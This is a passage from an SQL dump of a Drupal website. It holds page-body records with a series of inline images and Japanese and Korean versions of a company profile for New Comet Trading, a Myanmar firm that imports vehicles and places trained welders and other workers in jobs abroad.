data-align=\"center\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\" data-align=\"center\">', '', 'full_html'),
('page', 0, 23, 192, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">当社は</span><span style=\"mso-bidi-font-size:10.5pt;\">2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年に設立し、登録</span><span style=\"mso-bidi-font-size:10.5pt;\">ID(295/2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ー</span><span style=\"mso-bidi-font-size:10.5pt;\">2005)</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"mso-bidi-font-size:10.5pt;\">2023</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"mso-bidi-font-size:10.5pt;\">.</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"mso-bidi-font-size:10.5pt;\">25</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span style=\"mso-bidi-font-size:10.5pt;\">100</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"mso-bidi-font-size:10.5pt;\">200</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">現在、ニューコメットトレンディグエイジェンシーでは韓国の造船所で働きたいミャンマー全国から民族問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT, NAT-TEST, TOP-J)<span lang=\"JA\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 192, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> \"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧 해외 직업 소개회사</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun 